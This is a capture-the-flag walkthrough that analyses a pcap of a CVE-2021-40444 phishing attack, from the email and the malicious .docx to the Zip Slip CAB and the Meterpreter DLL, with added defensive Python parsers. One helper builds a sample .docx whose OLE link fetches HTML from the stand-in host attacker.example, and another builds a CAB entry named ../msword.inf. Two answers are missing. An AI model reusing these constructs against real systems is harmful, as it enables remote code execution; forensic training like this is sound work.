CyberDefenders: BSidesJeddah-Part1

As a security consultant, a phishing attack attributed to a popular APT group targeted one of your customers. Given the provided PCAP trace, analyze the attack and answer challenge questions.

Information

Category Name: BSidesJeddah-Part1

Files:
c62-bsidesjeddah-pcap.zip 46 MB
– e3.pcap 50 MB
– suricata.zip 1.8 MB

My Recommendations

Wireshark carries most of the challenge; Suricata (question 9) and a few command-line tools (7z, binwalk, pedump, scdbg) cover the rest. Check that Wireshark is installed with:

wireshark -v

Download it from CyberDefenders and verify it with:

sha1sum /path/to/c62-bsidesjeddah-pcap.zip

SHA1SUM: c1995aff38c8947a2555e575e1cef2df3c4f888e

Walkthrough

1. What is the victim's MAC address?

An easy way to find it is File > Export Objects > HTTP, then look for entries whose Content-Type is application/octet-stream, i.e. the executable the attacker served.

Pick any of those packets, for instance packet 3606, and look at its Ethernet header. The payload is being delivered to the victim, so the destination MAC address is the victim's:

Answer: 00:0C:29:B7:CA:91


2. What is the address of the company associated with the victim's machine MAC address?

The first three octets, 00:0C:29, are the OUI. Looking it up in the IEEE registry (I used an online OUI lookup site) shows it is assigned to VMware, Inc., whose registered address is:

Answer: 3401 Hillview Avenue Palo Alto CA 94304 US

3. What is the attacker's IP address?

We identified the victim's MAC address from frame 3606, the HTTP response carrying the executable. Its source IP, the host serving the payload, is the attacker's: 192.168.112.128.

Answer: 192.168.112.128


4. What is the IPv4 address of the DNS server used by the victim machine?

Filtering with eth.src == 00:0C:29:B7:CA:91 && dns shows every DNS query the victim sends.

All of them go to destination IPv4 192.168.112.2.

Answer: 192.168.112.2

5. What domain is the victim looking up in packet 5648?

Filtering with frame.number == 5648

Answer: omextemplates.content.office.net 

6. What is the server certificate public key that was used in TLS session:

731300002437c17bdfa2593dd0e0b28d391e680f764b5db3c4059f7abadbb28e

The quickest route is to filter on the session ID itself: tls.handshake.session_id == 73:13:00:00:24:37:c1:7b:df:a2:59:3d:d0:e0:b2:8d:39:1e:68:0f:76:4b:5d:b3:c4:05:9f:7a:ba:db:b2:8e. (The broader filter tls.handshake.type == 11 && tls.handshake.session_id_length == 32 also gets there, because the ServerHello that carries the session ID and the Certificate message share a frame, but it matches every 32-byte session ID in the capture.) The match is frame 2739. Note that what the challenge calls the server certificate public key is the 32-byte Pubkey under Server Key Exchange > EC Diffie-Hellman Server Params, i.e. the server's ephemeral ECDHE key for this session, not the key inside the X.509 certificate:

Answer: 64089e29f386356f1ffbd64d7056ca0f1d489a09cd7ebda630f2b7394e319406

7. What domain is the victim connected to in packet 4085?

Filtering with frame.number == 4085 shows only IP addresses. Enable View > Name Resolution and tick the Resolve ... Addresses options; Wireshark then labels the destination using the DNS answers seen earlier in the capture. Leave 'Use External Network Name Resolver' off during forensics so the names come from the pcap rather than from your own DNS:


Answer: v10.vortex-win.data.microsoft.com

8. The attacker conducted a port scan on the victim machine. How many open ports did the attacker find?

In a SYN scan the target answers a probe to an open port with SYN/ACK (and a closed port with RST/ACK), so the open ports are the ones from which the victim sent SYN/ACK back to the scanner.

Filter for those replies: eth.src == 00:0C:29:B7:CA:91 && ip.dst == 192.168.112.128 && tcp.flags.syn == 1 && tcp.flags.ack == 1. Then open Statistics > Endpoints, switch to the TCP tab and tick 'Limit to display filter'.

The list contains both ends of every conversation, the attacker's source ports as well as the victim's, which is why it shows far more than seven entries (28 here). Only the rows with the victim's IP matter, and their Port column is the set of open ports; sorting by address or by Bytes groups them so they are easy to count. Retransmitted SYN/ACKs do not inflate the count because Endpoints lists each IP:port pair once.

Answer: 7
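As an added example (not part of the original walkthrough), the same open-port logic in Python over a packet summary, de-duplicated per port and separating open, closed and unanswered probes. The input rows have the shape of `tshark -r e3.pcap -Y tcp -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.flags`; the rows embedded below are constructed for the example, and the victim IP 192.168.112.100 is a placeholder because the walkthrough never states the victim's IP.

```python
"""Open-port count from a SYN scan, from tshark-style field rows.
Added example; sample rows are constructed, victim IP is hypothetical."""

SYN, RST, ACK = 0x02, 0x04, 0x10          # tcp.flags bits

ATTACKER = "192.168.112.128"               # from the walkthrough
VICTIM = "192.168.112.100"                 # hypothetical: the walkthrough never gives the victim's IP

# Constructed rows: ip.src, ip.dst, tcp.srcport, tcp.dstport, tcp.flags (tab-separated, as tshark prints them).
# Probes to 80 and 445 get SYN/ACK (80 twice, a retransmission), 22 gets RST/ACK, 8080 gets nothing,
# and the last two rows are the victim's own outbound connection to the attacker's port 443.
SAMPLE_ROWS = """\
192.168.112.128\t192.168.112.100\t43012\t80\t0x0002
192.168.112.100\t192.168.112.128\t80\t43012\t0x0012
192.168.112.100\t192.168.112.128\t80\t43012\t0x0012
192.168.112.128\t192.168.112.100\t43012\t445\t0x0002
192.168.112.100\t192.168.112.128\t445\t43012\t0x0012
192.168.112.128\t192.168.112.100\t43012\t22\t0x0002
192.168.112.100\t192.168.112.128\t22\t43012\t0x0014
192.168.112.128\t192.168.112.100\t43012\t8080\t0x0002
192.168.112.100\t192.168.112.128\t49812\t443\t0x0002
192.168.112.128\t192.168.112.100\t443\t49812\t0x0012
"""


def parse_rows(text):
    """Parse tab-separated tshark field output into (src, dst, sport, dport, flags) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, dst, sport, dport, flags = line.split("\t")
        rows.append((src, dst, int(sport), int(dport), int(flags, 16)))
    return rows


def scan_results(rows, scanner, target):
    """Classify the target's ports from the scanner's point of view.

    open:     target answered a probe with SYN/ACK
    closed:   target answered with RST (usually RST/ACK)
    no_reply: scanner sent a bare SYN and nothing came back (filtered or dropped)
    Sets make retransmitted replies count once, and traffic the target itself
    initiated (e.g. a reverse shell to the scanner) is ignored.
    """
    probed, open_ports, closed = set(), set(), set()
    for src, dst, sport, dport, flags in rows:
        if src == scanner and dst == target and flags & SYN and not flags & ACK:
            probed.add(dport)
        elif src == target and dst == scanner:
            if flags & SYN and flags & ACK:
                open_ports.add(sport)
            elif flags & RST:
                closed.add(sport)
    return {
        "open": sorted(open_ports),
        "closed": sorted(closed),
        "no_reply": sorted(probed - open_ports - closed),
    }


if __name__ == "__main__":
    result = scan_results(parse_rows(SAMPLE_ROWS), ATTACKER, VICTIM)
    print(f"{len(result['open'])} open ports: {result['open']}")
    print("closed:", result["closed"], "no reply:", result["no_reply"])
```

Feeding it the real tshark output for e3.pcap (with the victim's actual IP) gives the same seven ports the Endpoints window does, without having to eyeball which rows belong to which side.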

9. Analyze the pcap using the provided rules. What is the CVE number falsely alerted by Suricata?

Using Suricata in cli mode, then looking at the logs:

suricata -r e3.pcap -S suricata.rules -l .
# -S loads only the challenge's rules; -l . writes fast.log (and eve.json) into the current directory
grep EXPLOIT fast.log | grep -v Invalid

The rule that fired, sid 2030387, is defined as:

				
					alert ipv6 any any -> ff00::/8 any (msg:"ET EXPLOIT Possible CVE-2020-11899 Multicast out-of-bound read";  reference:url,www.jsof-tech.com/ripple20/; classtype:attempted-admin; sid:2030387; rev:1; metadata:created_at 2020_06_22, former_category EXPLOIT, performance_impact Significant, signature_severity Major, updated_at 2020_08_20;)
				
			

Filtering the pcap on the source flagged in the log, ipv6.addr == fe80::d4aa:8d54:3230:720b, shows why this is a false positive. The rule has no content or protocol condition at all: any IPv6 packet whose destination falls in ff00::/8, the whole multicast range, fires it, so ordinary neighbour discovery, MLD or LLMNR traffic to ff02:: addresses is enough. Packet 2692 is the only frame in the capture that meets that condition, and nothing in it relates to the Treck TCP/IP stack bug (Ripple20) the signature is named after.

Answer: CVE-2020-11899
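As an added example (not part of the original walkthrough), a small parser for the fast.log format that groups alerts by signature, pulls out the CVE each message names and records whether the destination was IPv6 multicast, which is the only condition sid 2030387 actually tests. The two log lines embedded in it are constructed for this example: the first mirrors the shape of the alert above, the second uses a made-up local sid (1000001) and a placeholder victim IP (192.168.112.100), neither of which comes from the challenge.

```python
"""Parse Suricata fast.log, summarise per signature, flag multicast-only rules.
Added example; the log lines below are constructed, not the challenge's output."""
import ipaddress
import re
from collections import defaultdict

# Layout of a fast.log line:
# <ts>  [**] [gid:sid:rev] <msg> [**] [Classification: ...] [Priority: n] {PROTO} src:port -> dst:port
FAST_LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\]\s+\[Classification:\s*(?P<cls>[^\]]*)\]\s+"
    r"\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>\S+)\s+->\s+(?P<dst>\S+)$"
)
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

# Constructed sample. Line 1 has the shape of the sid 2030387 alert from the
# walkthrough; line 2 is an invented local rule against a placeholder victim IP.
SAMPLE_FAST_LOG = """\
10/01/2021-12:30:01.123456  [**] [1:2030387:1] ET EXPLOIT Possible CVE-2020-11899 Multicast out-of-bound read [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {IPv6-ICMP} fe80:0000:0000:0000:d4aa:8d54:3230:720b:0 -> ff02:0000:0000:0000:0000:0000:0000:0016:0
10/01/2021-12:31:55.654321  [**] [1:1000001:1] LOCAL Constructed CVE-2021-40444 document download [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.112.128:80 -> 192.168.112.100:49731
"""


def split_addr_port(s):
    """fast.log prints addr:port for IPv4 and IPv6 alike; the port follows the last colon."""
    addr, _, port = s.rpartition(":")
    return addr, int(port)


def parse_fast_log(text):
    alerts = []
    for line in text.splitlines():
        m = FAST_LOG_RE.match(line.strip())
        if not m:
            continue  # blank or truncated line
        a = m.groupdict()
        a["src_ip"], a["src_port"] = split_addr_port(a["src"])
        a["dst_ip"], a["dst_port"] = split_addr_port(a["dst"])
        a["cves"] = CVE_RE.findall(a["msg"])
        # ff00::/8 is the IPv6 multicast range the ET rule matches on
        a["dst_multicast"] = ipaddress.ip_address(a["dst_ip"]).is_multicast
        alerts.append(a)
    return alerts


def summarize(alerts):
    """Per-sid count, CVEs named in the message, and whether every hit was to a multicast destination."""
    by_sid = defaultdict(lambda: {"msg": None, "count": 0, "cves": set(), "all_dst_multicast": True})
    for a in alerts:
        s = by_sid[a["sid"]]
        s["msg"] = a["msg"]
        s["count"] += 1
        s["cves"].update(a["cves"])
        s["all_dst_multicast"] = s["all_dst_multicast"] and a["dst_multicast"]
    return dict(by_sid)


if __name__ == "__main__":
    for sid, s in summarize(parse_fast_log(SAMPLE_FAST_LOG)).items():
        note = " (every hit went to IPv6 multicast: header-only rule, likely noise)" if s["all_dst_multicast"] else ""
        print(f"sid {sid}: {s['count']} alert(s), CVEs {sorted(s['cves'])}{note}")
```

Running it over the real fast.log after the suricata command above lists each signature once with the CVE it claims, which makes the single header-only multicast alert stand out against everything else.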

10. What is the command parameter sent by the attacker in packet number 2650?

Filtering with frame.number == 2650 lands on an SMTP command.

Its Request parameter, as Wireshark decodes it, is kali.

Answer: kali


11. What is the stream number which contains email traffic?

Filtering with smtp, frame 2653 carries Request parameter: FROM:<support@cyberdefenders.org>, the start of the mail transaction. Selecting Follow > TCP Stream on it shows the whole exchange, which is indeed the email:

Answer: 1183

12. What is the victim's email address?

As seen in that stream, the recipient (the RCPT TO command, and the To: header of the message) is joshua:

Answer: joshua@cyberdefenders.org

13. What was the time attacker sent the email?

In TCP stream 1183 the message's Date header shows it was sent on 1 Oct 2021 at 12:31:54; the challenge wants the clock time as written there:

Answer: 12:31:54

14. What is the version of the program used to send the email?

Again in TCP stream 1183, the message headers name the sending program as sendEmail, version 1.56:

Answer: 1.56

15. What is the MD5 hash of the email attachment?

Copy the Base64 body of the attachment part (everything between its MIME headers and the closing boundary line), decode it and hash the result. GNU base64 -d accepts the 76-column line breaks; if stray characters crept in while copying, add -i to ignore them:

echo -n '#base64encoded' | base64 -d > 'web server.docx'
# replace the placeholder with the copied Base64 text
md5sum 'web server.docx'
#returns 55e7660d9b21ba07fc34630d49445030

Answer: 55e7660d9b21ba07fc34630d49445030
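As an added example that is not part of the original walkthrough, covering questions 11 to 15 in one place: the SMTP stream saved from Follow > TCP Stream (client-to-server direction only, which is the assumption here) is stripped down to the RFC 5322 message, SMTP dot-stuffing is undone, and Python's email package pulls out the recipient, the Date header, the X-Mailer version and the MD5 of each attachment. The stream embedded below is constructed for the example; its "attachment" is a short text string rather than a real .docx, so the hash it reports is not the challenge's.

```python
"""SMTP stream -> message -> headers and attachment hashes.
Added example; the stream below is constructed (the attachment is a plain
sentence, not the challenge's .docx)."""
import email
import hashlib
import re
from email import policy
from email.utils import parsedate_to_datetime

# Constructed client->server SMTP dump, as saved from Follow > TCP Stream.
SAMPLE_STREAM = b"\r\n".join([
    b"EHLO kali",
    b"MAIL FROM:<support@cyberdefenders.org>",
    b"RCPT TO:<joshua@cyberdefenders.org>",
    b"DATA",
    b"From: support@cyberdefenders.org",
    b"To: joshua@cyberdefenders.org",
    b"Subject: Web server specs",
    b"Date: Fri, 1 Oct 2021 12:31:54 +0000",
    b"X-Mailer: sendEmail-1.56",
    b"MIME-Version: 1.0",
    b'Content-Type: multipart/mixed; boundary="----MIME delimiter for sendEmail-123"',
    b"",
    b"------MIME delimiter for sendEmail-123",
    b'Content-Type: text/plain; charset="iso-8859-1"',
    b"Content-Transfer-Encoding: 7bit",
    b"",
    b"Hi Joshua,",
    b"..please see the attached specification.",  # dot-stuffed: the real line starts with one '.'
    b"------MIME delimiter for sendEmail-123",
    b'Content-Type: application/octet-stream; name="web server.docx"',
    b"Content-Transfer-Encoding: base64",
    b'Content-Disposition: attachment; filename="web server.docx"',
    b"",
    b"VGhlIHF1aWNrIGJyb3duIGZveCBqdW1wcyBvdmVyIHRoZSBsYXp5IGRvZw==",  # "The quick brown fox ..." as a stand-in payload
    b"------MIME delimiter for sendEmail-123--",
    b".",
    b"QUIT",
    b"",
])


def message_from_smtp_stream(stream: bytes) -> bytes:
    """Return the raw message: the bytes between DATA and the lone '.' terminator,
    with SMTP dot-stuffing undone (a line sent as '..x' means '.x')."""
    lines = stream.replace(b"\r\n", b"\n").split(b"\n")
    try:
        start = next(i for i, l in enumerate(lines) if l.strip().upper() == b"DATA") + 1
    except StopIteration:
        raise ValueError("no DATA command in stream") from None
    body = []
    for line in lines[start:]:
        if line == b".":
            break
        body.append(line[1:] if line.startswith(b"..") else line)
    else:
        raise ValueError("message not terminated by <CRLF>.<CRLF>")
    return b"\r\n".join(body) + b"\r\n"


def summarize_message(raw: bytes) -> dict:
    msg = email.message_from_bytes(raw, policy=policy.default)
    sent = parsedate_to_datetime(str(msg["Date"])) if msg["Date"] else None
    mailer = str(msg.get("X-Mailer", ""))
    version = re.search(r"sendEmail-(\d+(?:\.\d+)*)", mailer)
    text = msg.get_body(preferencelist=("plain",))
    attachments = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""      # undoes the base64 transfer encoding
        attachments.append({"filename": part.get_filename(),
                            "size": len(data),
                            "md5": hashlib.md5(data).hexdigest()})
    return {
        "from": str(msg["From"]), "to": str(msg["To"]),
        "sent_at": sent.strftime("%H:%M:%S") if sent else None,   # clock time as written in the header
        "tz": sent.strftime("%z") if sent else None,
        "mailer": mailer, "mailer_version": version.group(1) if version else None,
        "body": text.get_content() if text else "",
        "attachments": attachments,
    }


if __name__ == "__main__":
    summary = summarize_message(message_from_smtp_stream(SAMPLE_STREAM))
    for k, v in summary.items():
        print(f"{k}: {v}")
```

Pointed at the bytes saved from stream 1183 (client direction), this yields the recipient, the 12:31:54 timestamp, sendEmail 1.56 and the attachment's MD5 in one go, and the decoded attachment bytes can be written to disk for the next steps instead of copy-pasting Base64.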

16. What is the CVE number the attacker tried to exploit using the malicious document?

Searching the MD5 on VirusTotal turns up a long list of detections that name CVE-2021-40444, the MSHTML remote code execution vulnerability exploited through crafted Office documents:


Answer: CVE-2021-40444 

17. The malicious document file contains a URL to a malicious HTML file.

Provide the URL for this file.

A .docx is a ZIP archive, so extract it and look for the external relationship: the URL sits in word/_rels/document.xml.rels (external targets carry TargetMode="External"), which a grep for '.html' also finds:

7z x 'web server.docx' -owebserver
grep -r -F '.html' webserver

18. What is the LinkType of the OLEObject related to the relationship which contains the malicious URL?

Using Didier Stevens' xmldump.py to list the attributes in the relationships file and get the Id of the relationship that carries the malicious URL (rId6):

xmldump.py attributes webserver/word/_rels/document.xml.rels

Then pretty-print document.xml and find the OLEObject that references that Id:

xmldump.py pretty webserver/word/document.xml | grep rId6 -B 5 -A 5

The OLEObject's LinkType attribute is EnhancedMetaFile.

Answer: EnhancedMetaFile
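As an added example (not the walkthrough's or Didier Stevens' code) that does the work of questions 17 and 18 programmatically: open the .docx as a ZIP, list every relationship with TargetMode="External", and join each to the o:OLEObject in word/document.xml that references it, reporting Type, ProgID, LinkType and UpdateMode. Because the challenge document is not reproduced here, the block builds a minimal constructed .docx with one linked OLEObject (rId6, as in the walkthrough) pointing at the placeholder URL http://attacker.example/word.html; the real URL is whatever the relationships file in your extracted copy says.

```python
"""Triage a .docx for external OLE links (CVE-2021-40444 style).
Added example; the sample document is constructed and its URL is a placeholder."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
O_NS = "urn:schemas-microsoft-com:office:office"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def external_relationships(zf):
    """Every relationship in the package whose target lives outside it."""
    found = []
    for name in zf.namelist():
        if not name.endswith(".rels"):
            continue
        root = ET.fromstring(zf.read(name))
        for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
            if rel.get("TargetMode", "").lower() == "external":
                found.append({"rels": name, "rId": rel.get("Id"),
                              "type": rel.get("Type", "").rsplit("/", 1)[-1],
                              "target": rel.get("Target")})
    return found


def ole_objects(zf, part="word/document.xml"):
    """Attributes of each o:OLEObject in the main document, with r:id exposed as rId."""
    root = ET.fromstring(zf.read(part))
    objs = []
    for ole in root.iter(f"{{{O_NS}}}OLEObject"):
        attrs = dict(ole.attrib)
        attrs["rId"] = attrs.pop(f"{{{R_NS}}}id", None)
        objs.append(attrs)
    return objs


def triage_docx(data: bytes) -> list:
    """Join external relationships of the main part to the OLEObjects that use them."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        ext = {r["rId"]: r for r in external_relationships(zf)
               if r["rels"] == "word/_rels/document.xml.rels"}
        findings = []
        for ole in ole_objects(zf):
            rel = ext.get(ole["rId"])
            if rel is None:
                continue  # embedded object, not a link
            findings.append({
                "rId": ole["rId"], "target": rel["target"], "rel_type": rel["type"],
                "Type": ole.get("Type"), "ProgID": ole.get("ProgID"),
                "LinkType": ole.get("LinkType"), "UpdateMode": ole.get("UpdateMode"),
                # remote HTML pulled in through an OLE link is the 40444 pattern
                "suspicious": bool(re.match(r"(?i)^(mhtml:|https?://)", rel["target"] or "")),
            })
        return findings


def build_sample_docx(url: str) -> bytes:
    """Minimal constructed .docx: one paragraph holding a linked OLEObject (rId6)."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W_NS}" xmlns:r="{R_NS}" xmlns:o="{O_NS}" '
        'xmlns:v="urn:schemas-microsoft-com:vml"><w:body><w:p><w:r><w:object>'
        '<v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:1pt;height:1pt"/>'
        '<o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" '
        'r:id="rId6" UpdateMode="OnCall" LinkType="EnhancedMetaFile"/>'
        '</w:object></w:r></w:p></w:body></w:document>'
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{R_NS}/styles" Target="styles.xml"/>'
        f'<Relationship Id="rId6" Type="{R_NS}/oleObject" Target="{url}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_docx(build_sample_docx("http://attacker.example/word.html")):
        print(f)
```

Run `triage_docx(open("web server.docx", "rb").read())` on the real attachment to get the URL and the LinkType in one line of output; the join on rId is what the grep -B 5 -A 5 above does by hand.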

19. What is the Microsoft Office version installed on the victim machine?

Now that we know the document fetches a second file, filter for that request in Wireshark: http.request.uri == "/word.html"

The User-Agent of the request coming from the victim's machine reports the Office build as 15.0.4517.

Answer: 15.0.4517

20. The malicious HTML contains a js code that points to a malicious CAB file. Provide the URL to the CAB file?

Save word.html via File > Export Objects > HTTP and inspect it:

cat word.html

The script is obfuscated, but the URL of the CAB file is stored in a variable:

21. The exploit takes advantage of a CAB vulnerability. Provide the vulnerability name?

Searching for CVE-2021-40444 together with 'cab' turns up a GitHub repository with a clear explanation of the exploit chain.

It describes the Zip Slip path traversal in the CAB: a file entry named with ../ so that extraction writes it outside the intended directory. A more detailed report on Zip Slip covers the general technique.

Answer: zipslip

22. The CAB file contains a malicious dll file. What is the tool used to generate the dll?

Following the same steps as in Question 20, save word.cab to the working directory. cabextract and 7z both error out on it, which fits the attack: the archive is crafted for Windows' own extraction path, not to be a well-formed CAB. Instead, carve the embedded files out with binwalk:

binwalk --dd=".*" -e word.cab
file _word.cab.extracted/*
#file 52 is a PE executable
md5sum _word.cab.extracted/52
#returns 2d7972ec8f063348991490c3d15ce989

Searching that hash on VirusTotal shows it flagged as a Meterpreter/Metasploit trojan.

Answer: metasploit

23. What is the path of the dropped malicious dll file? Replace your username with IEUser

As the GitHub repository explains, the .inf file (msword.inf) ends up in the user's TEMP directory, AppData\Local\Temp\msword.inf under the profile. With IEUser as the username:

Answer: 
C:\Users\IEUser\AppData\Local\Temp\msword.inf
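As an added example (not part of the original walkthrough) tying questions 21 to 23 together: a header-only CAB parser that walks the CFFILE table and flags entry names that escape the extraction directory, which is the Zip Slip pattern the exploit relies on, plus a sanity check of the declared cabinet size against the actual one, one of the inconsistencies a strict extractor rejects. Real CAB files carry compressed CFDATA blocks after the file table, which this parser does not touch. Since the challenge's word.cab is not reproduced here, the block builds a small constructed archive with two entries, one of them ../msword.inf, to run against; the real sample's entry names are whatever word.cab contains.

```python
"""Header-only CAB parser: list CFFILE entries and flag path traversal.
Added example; the archive it inspects is constructed, not the challenge's word.cab."""
import re
import struct

# CFHEADER: signature, reserved1, cbCabinet, reserved2, coffFiles, reserved3,
#           versionMinor, versionMajor, cFolders, cFiles, flags, setID, iCabinet   (36 bytes)
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")
# CFFILE fixed part: cbFile, uoffFolderStart, iFolder, date, time, attribs   (then szName, NUL-terminated)
CFFILE = struct.Struct("<IIHHHH")
A_NAME_IS_UTF = 0x80      # attribs bit: szName is UTF-8


def is_traversal(name: str) -> bool:
    """True if extracting this name would land outside the target directory."""
    parts = re.split(r"[\\/]", name)
    return name.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", name) is not None or ".." in parts


def list_cab_files(data: bytes) -> dict:
    sig, _, cb_cabinet, _, coff_files, _, _v_minor, _v_major, c_folders, c_files, *_ = CFHEADER.unpack_from(data, 0)
    if sig != b"MSCF":
        raise ValueError("not a CAB file (bad MSCF signature)")
    files, off = [], coff_files
    for _ in range(c_files):
        cb_file, _uoff, ifolder, _date, _time, attribs = CFFILE.unpack_from(data, off)
        off += CFFILE.size
        end = data.index(b"\x00", off)
        name = data[off:end].decode("utf-8" if attribs & A_NAME_IS_UTF else "cp1252", errors="replace")
        off = end + 1
        files.append({"name": name, "size": cb_file, "folder": ifolder, "traversal": is_traversal(name)})
    return {"declared_size": cb_cabinet, "actual_size": len(data), "folders": c_folders, "files": files}


def build_sample_cab(names) -> bytes:
    """Constructed header + one CFFOLDER + CFFILE table, no CFDATA (enough for name triage)."""
    coff_files = CFHEADER.size + 8                       # CFFOLDER is 8 bytes without reserve
    table = b"".join(CFFILE.pack(0, 0, 0, 0x5341, 0x6000, 0x20) + n.encode() + b"\x00" for n in names)
    cb_cabinet = coff_files + len(table)
    header = CFHEADER.pack(b"MSCF", 0, cb_cabinet, 0, coff_files, 0, 3, 1, 1, len(names), 0, 0x1234, 0)
    folder = struct.pack("<IHH", cb_cabinet, 0, 0)       # coffCabStart, cCFData=0, typeCompress=none
    return header + folder + table


if __name__ == "__main__":
    info = list_cab_files(build_sample_cab(["../msword.inf", "readme.txt"]))
    if info["declared_size"] != info["actual_size"]:
        print("cabinet size mismatch: header says", info["declared_size"], "file is", info["actual_size"])
    for f in info["files"]:
        print(f"{f['name']!r:20} size={f['size']} {'TRAVERSAL' if f['traversal'] else 'ok'}")
```

On the real word.cab, `list_cab_files(open("word.cab", "rb").read())` shows the entry names and sizes even when cabextract and 7z give up, and the traversal flag explains how the payload ends up in the Temp directory rather than in the extraction folder.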


24. Analyzing the dll file what is the API used to write the shellcode in the process memory?

Running pedump on the carved DLL to list its imports:

pedump _word.cab.extracted/52

The import table contains WriteProcessMemory, the only imported API that writes into process memory:

Answer: WriteProcessMemory

25. Extracting the shellcode from the dll file. What is the name of the library loaded by the shellcode?

No manual reversing is needed: scdbg accepts the DLL directly and, with /findsc, locates and emulates the shellcode, logging the Windows APIs it calls.

The library the shellcode loads is wininet.

Answer: wininet

26. Which port was configured to receive the reverse shell?

In the scdbg output the shellcode calls InternetConnectA towards the attacker's IP on port 443, the port configured for the reverse shell:

Answer: 443
